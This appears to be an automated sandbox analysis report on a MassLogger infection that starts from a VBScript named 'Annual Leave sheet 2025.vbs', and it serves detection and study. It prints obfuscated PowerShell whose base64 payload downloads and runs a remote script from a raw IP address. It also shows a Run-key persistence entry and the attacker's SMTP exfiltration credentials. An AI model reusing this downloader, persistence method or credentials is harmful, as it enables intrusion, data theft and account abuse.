InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" , ProcessId: 1816, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: File created; Author: Subhash Popuri (@pbssubhash); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1276, TargetFilename: C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", ProcessId: 5364, ProcessName: wscript.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\DeviceCredentialDeployment.exe", CommandLine: "C:\Windows\system32\DeviceCredentialDeployment.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\DeviceCredentialDeployment.exe, NewProcessName: C:\Windows\System32\DeviceCredentialDeployment.exe, OriginalFileName: C:\Windows\System32\DeviceCredentialDeployment.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\DeviceCredentialDeployment.exe", ProcessId: 5852, ProcessName: DeviceCredentialDeployment.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", ProcessId: 1632, ProcessName: csc.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6756, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nova_kaycee[1].vbs
Source: Network Connection; Author: frack113; Data: DestinationIp: 198.54.122.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 1276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49833
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", ProcessId: 5364, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6756, TargetFilename: C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))", CommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", ProcessId: 1632, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Registry Key set; Author: Joe Security; Data: Details: wscript.exe "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_542
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-01-21T16:45:27.566855+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49774        193.122.6.168   80                TCP
2025-01-21T16:45:43.066710+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49876        193.122.6.168   80                TCP
2025-01-21T16:45:47.738613+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49903        193.122.6.168   80                TCP
2025-01-21T16:45:57.566691+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49967        193.122.6.168   80                TCP
2025-01-21T16:46:07.787342+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49930        193.122.6.168   80                TCP
2025-01-21T16:46:09.019826+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49985        193.122.6.168   80                TCP
2025-01-21T16:46:09.394915+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50015        193.122.6.168   80                TCP
2025-01-21T16:46:21.441724+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50024        193.122.6.168   80                TCP
2025-01-21T16:46:32.629402+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50031        193.122.6.168   80                TCP
2025-01-21T16:47:11.785608+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50062        158.101.44.242  80                TCP
2025-01-21T16:47:17.988588+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50062        158.101.44.242  80                TCP
2025-01-21T16:47:18.129209+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50068        158.101.44.242  80                TCP
2025-01-21T16:47:24.035478+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50068        158.101.44.242  80                TCP
2025-01-21T16:47:25.285511+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50078        158.101.44.242  80                TCP
2025-01-21T16:47:31.129422+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50078        158.101.44.242  80                TCP
2025-01-21T16:47:31.441695+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50082        158.101.44.242  80                TCP
2025-01-21T16:47:37.238575+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50082        158.101.44.242  80                TCP
2025-01-21T16:47:40.488565+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50088        158.101.44.242  80                TCP
2025-01-21T16:47:46.426087+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50088        158.101.44.242  80                TCP
2025-01-21T16:47:47.238613+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50091        158.101.44.242  80                TCP
2025-01-21T16:47:53.051108+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  50091        158.101.44.242  80                TCP
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-21T16:45:20.198282+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  49730        168.119.145.117  443               TCP
2025-01-21T16:45:43.955524+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  49881        168.119.145.117  443               TCP
2025-01-21T16:45:52.769799+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  49941        168.119.145.117  443               TCP
2025-01-21T16:46:05.309903+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50007        168.119.145.117  443               TCP
2025-01-21T16:46:16.972293+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50021        168.119.145.117  443               TCP
2025-01-21T16:46:22.666392+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50026        168.119.145.117  443               TCP
2025-01-21T16:46:33.422187+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50035        168.119.145.117  443               TCP
2025-01-21T16:46:47.445275+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50045        168.119.145.117  443               TCP
2025-01-21T16:46:57.635253+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50052        168.119.145.117  443               TCP
2025-01-21T16:47:03.533390+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50056        168.119.145.117  443               TCP
2025-01-21T16:47:10.595121+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50061        168.119.145.117  443               TCP
2025-01-21T16:47:18.749229+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50069        168.119.145.117  443               TCP
2025-01-21T16:47:25.043785+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50076        168.119.145.117  443               TCP
2025-01-21T16:47:34.127854+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50086        168.119.145.117  443               TCP
2025-01-21T16:47:40.869815+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50089        168.119.145.117  443               TCP
2025-01-21T16:47:55.519388+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  50095        168.119.145.117  443               TCP

AV Detection

Source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "ozge.begindim@pakmeya.com", "Password": "Sapsup1481", "Server": "mail.privateemail.com"}
Source: Annual Leave sheet 2025.vbs; Virustotal: Detection: 8%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50052 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50061 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50065 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50069 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50071 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50076 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50079 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50085 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50086 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50089 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50090 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50095 version: TLS 1.2
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdb9 source: powershell.exe, 00000016.00000002.2783605754.00000000071EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: corlib.pdbX0+ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb= source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Management.Infrastructure.Native.pdb) source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdba0$ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb; source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: gement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2804335664.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdbhP source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbou source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdb source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 364e35\Microsoft.Management.Infrastructure.Native.pdb& source: powershell.exe, 00000016.00000002.2806054422.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: indows\dll\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: re.Native.pdb source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdba source: powershell.exe, 0000000D.00000002.3718811327.0000000008310000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32f source: powershell.exe, 0000001E.00000002.2807890146.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %cqscorlib.pdbC source: powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0T source: powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbZ3 source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2806054422.000000000804C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2793833295.00000000072DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdbev source: powershell.exe, 0000001E.00000002.2743365058.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb) source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ::$DATAgement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0d source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8W source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.0000000008491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb| source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07289635h | 13_2_07289458
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07289FBFh | 13_2_07289458
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then push 00000000h | 13_2_0728C890
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07283A40h | 13_2_07283798
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 13_2_07288F9B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 072828E0h | 13_2_07282638
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 072858AAh | 13_2_07285600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07288120h | 13_2_07287E78
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 13_2_0728D69A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07283190h | 13_2_07282EE8
